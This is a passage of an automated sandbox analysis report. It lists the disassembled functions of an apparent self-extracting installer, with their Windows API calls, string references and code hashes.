                                                                                                        • Instruction Fuzzy Hash: 24518861A296C549FB216F259C043BAEB91BB49F91F8C4172CACE0F7C5CE3CD8458761
                                                                                                        Function 00007FF7E6E83F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
                                                                                                          • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
                                                                                                          • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
                                                                                                          • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
                                                                                                          • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
                                                                                                          • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
                                                                                                        • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E83F95
                                                                                                        • LocalFree.KERNEL32 ref: 00007FF7E6E84018
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
                                                                                                          • Part of subcall function 00007FF7E6E87700: GetLastError.KERNEL32 ref: 00007FF7E6E87704
                                                                                                        • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E8403E
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00007FF7E6E83139), ref: 00007FF7E6E8409F
                                                                                                          • Part of subcall function 00007FF7E6E87AC8: FindResourceA.KERNEL32 ref: 00007FF7E6E87AF2
                                                                                                          • Part of subcall function 00007FF7E6E87AC8: LoadResource.KERNEL32 ref: 00007FF7E6E87B09
                                                                                                          • Part of subcall function 00007FF7E6E87AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7E6E87B3F
                                                                                                          • Part of subcall function 00007FF7E6E87AC8: FreeResource.KERNEL32 ref: 00007FF7E6E87B51
                                                                                                        • LocalFree.KERNEL32 ref: 00007FF7E6E84078
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                        • String ID: <None>$LICENSE
                                                                                                        • API String ID: 2414642746-383193767
                                                                                                        • Opcode ID: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                        • Instruction ID: 1a810980676f452584e6e615e814173fb8989ec3022e8e41316d60685ce93524
                                                                                                        • Opcode Fuzzy Hash: 500bea89e5f40005163dcf95b2e3e849d331b5811c5609ba5abe631ca88a2bf8
                                                                                                        • Instruction Fuzzy Hash: 40314D71A3878286E710AB60EC1577BB6A1FB94B45FD84136D58E0E6D0EF7DA0048622
                                                                                                        Function 00007FF7E6E8772C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E8114C: _vsnprintf.MSVCRT ref: 00007FF7E6E81189
                                                                                                        • LoadResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87763
                                                                                                        • LockResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87772
                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E877B8
                                                                                                        • FindResourceA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E877EC
                                                                                                        • FreeResource.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF7E6E8606F), ref: 00007FF7E6E87805
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                        • String ID: UPDFILE%lu
                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                        • Opcode ID: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                        • Instruction ID: a5082b63688c033300ce2b55d7a2384fc418f26455a3f78dd23b109c2b0c1e61
                                                                                                        • Opcode Fuzzy Hash: 5da28ac000a46b9a165e15456f701c43c89cc60981a221babc32eae9389c35de
                                                                                                        • Instruction Fuzzy Hash: 85317731A187C1C6EB10AB15A80127AFB91FB89F50F998536DA9E0B7D4CF3CD445C711
                                                                                                        Function 00007FF7E6E85050 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3370778649-0
                                                                                                        • Opcode ID: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                        • Instruction ID: 912f0c9019f3b33f11a0646be938920ef32431b3e95c103b6e421e1635f3f8e2
                                                                                                        • Opcode Fuzzy Hash: 354dd0a735b34388ad5f877ea76a86da7b7875453ded65a43a8ee6639794adbd
                                                                                                        • Instruction Fuzzy Hash: D3116A21B18B8187EB446F66B80427AFAA0FB4EFC0B889039DD8E4B795DF3CD4448611
                                                                                                        Function 00007FF7E6E82244 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                        • String ID: wininit.ini
                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                        • Opcode ID: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                        • Instruction ID: 7faf09f53a9ff1c072a5a9567fc21c96811ee855e6d1672d22708ab79e03067f
                                                                                                        • Opcode Fuzzy Hash: 199b65378ca9828830684770953ab38004a5dc8256a53cff6ace6da1301a0c22
                                                                                                        • Instruction Fuzzy Hash: 2D113332A14A8187D710AB25EC543AAB7A1FBCDB14FC98132DA8E47694DF3CD509C610
                                                                                                        Function 00007FF7E6E83840 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                        • String ID: Adv
                                                                                                        • API String ID: 761066910-921584719
                                                                                                        • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                        • Instruction ID: 77057a87b52ba5b8e3ae53fbf68f827b2b21afc9d43f464064f66789caf498f5
                                                                                                        • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                        • Instruction Fuzzy Hash: 9D111F64D287C286F6543B95EC0837AEA51FB5AF41FCC9132C88E5A7D4DE3CA4448622
                                                                                                        Function 00007FF7E6E8494C Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 55memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85078
                                                                                                          • Part of subcall function 00007FF7E6E85050: SizeofResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E85089
                                                                                                          • Part of subcall function 00007FF7E6E85050: FindResourceA.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850AF
                                                                                                          • Part of subcall function 00007FF7E6E85050: LoadResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850C0
                                                                                                          • Part of subcall function 00007FF7E6E85050: LockResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850CF
                                                                                                          • Part of subcall function 00007FF7E6E85050: memcpy_s.MSVCRT ref: 00007FF7E6E850EE
                                                                                                          • Part of subcall function 00007FF7E6E85050: FreeResource.KERNEL32(?,?,00000000,00007FF7E6E82E43), ref: 00007FF7E6E850FD
                                                                                                        • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7E6E83388), ref: 00007FF7E6E84975
                                                                                                        • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7E6E83388), ref: 00007FF7E6E84A11
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: LoadStringA.USER32 ref: 00007FF7E6E84E60
                                                                                                          • Part of subcall function 00007FF7E6E84DCC: MessageBoxA.USER32 ref: 00007FF7E6E84EA0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                        • String ID: <None>$@$FINISHMSG
                                                                                                        • API String ID: 3507850446-4126004490
                                                                                                        • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                        • Instruction ID: 54521182c9d5110f4fdc4fd074c55d517feb2b12484ad70945bbf0890b56ae57
                                                                                                        • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                        • Instruction Fuzzy Hash: C1119272A28382C7F720AB24E81077BF690FB85B54F889136DA8E4A7C5DF3CD0048B15
                                                                                                        Function 00007FF7E6E879F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                        • API String ID: 438848745-726598030
                                                                                                        • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                        • Instruction ID: 9ab2452c5e4232f2167eb21e7eb301d8e928a1143b7e5edff3e9556ff84574ce
                                                                                                        • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                        • Instruction Fuzzy Hash: B0115E31A296C685EE21AB14E8413FAB7A0FB89F04FC80272C5DD0A6D1DF3DD60AC711
                                                                                                        Function 00007FF7E6E81500 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1273765764-0
                                                                                                        • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                        • Instruction ID: e8c5831a7ee5fe75c1baa9f8ed2dfbb7ee9c16109b1170992d342e4c606dde37
                                                                                                        • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                        • Instruction Fuzzy Hash: 0F116371E28BC686EA506B54B8083BAE760FB89F55F884232C99E0A7D5CF3CD0458761
                                                                                                        Function 00007FF7E6E83BF4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                        • String ID: Adv
                                                                                                        • API String ID: 2312377310-921584719
                                                                                                        • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                        • Instruction ID: 6aed14fc4e8649de80867d62084f698e5fc62102748f2030b41bcd7e96c3f79c
                                                                                                        • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                        • Instruction Fuzzy Hash: C6A1A632E392C286F760AB519C4437BF664BB64F50F990037E98D4B2D1DA3CE8458B62
                                                                                                        Function 00007FF7E6E878B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                        • API String ID: 1065093856-1955631000
                                                                                                        • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                        • Instruction ID: b4a00fa44196c8eb9ee0512161097b4d66458a195fb2d3bd48c589c47967d134
                                                                                                        • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                        • Instruction Fuzzy Hash: F83163726286C186EB119F10E8457AAFB60FB89BA4F884236DADD4B7D4CF7CD404C721
                                                                                                        Function 00007FF7E6E85C60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *MEMCAB
                                                                                                        • API String ID: 0-3211172518
                                                                                                        • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                        • Instruction ID: d06406aede54dc933e1b0eb331425aa6a1c52d70f5b6339bde93af309cefa9ee
                                                                                                        • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                        • Instruction Fuzzy Hash: BD313C31A28B8185EA90AB11E8483BBB3E1FB44F50FD94237D99D4A2D1EF3CD445CB52
                                                                                                        Function 00007FF7E6E88470 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                        • String ID:
                                                                                                        • API String ID: 140117192-0
                                                                                                        • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                        • Instruction ID: 75d9d4b197f3664e5b461eeda3edb1d7d0a602988865577e80ffbe251670021a
                                                                                                        • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                        • Instruction Fuzzy Hash: 1241F835A28F8181EA10AB18FC81366A364FB89F94F980137D9CD4B7A4DF3CD445C721
                                                                                                        Function 00007FF7E6E87C40 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Char$Prev$Next
                                                                                                        • String ID:
                                                                                                        • API String ID: 3260447230-0
                                                                                                        • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                        • Instruction ID: 22b35d18be49a49cb5c382ff5bd9aa818200831d97d200382697251367a35c79
                                                                                                        • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                        • Instruction Fuzzy Hash: 31118262E186C185EB515B15A90037AEE91B74EFE1F8D8231DA9A0B7C5CE3C98408722
                                                                                                        Function 00007FF7E6E88648 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                        • String ID:
                                                                                                        • API String ID: 140117192-0
                                                                                                        • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                        • Instruction ID: b4f655cc5a888ae784f6f53601711df227f1847588b1973735fe2d6960860008
                                                                                                        • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                        • Instruction Fuzzy Hash: 2721D235928F8181E610AB48FC8536AB3A4FB8AF54F940036DA8D4BBA4DF3CD445C762
                                                                                                        Function 00007FF7E6E83B40 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.1290331068.00007FF7E6E81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E6E80000, based on PE: true
                                                                                                        • Associated: 00000004.00000002.1290301886.00007FF7E6E80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290391474.00007FF7E6E89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290448833.00007FF7E6E8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                        • Associated: 00000004.00000002.1290473952.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7ff7e6e80000_GdGXG0bnxH.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2776232527-0
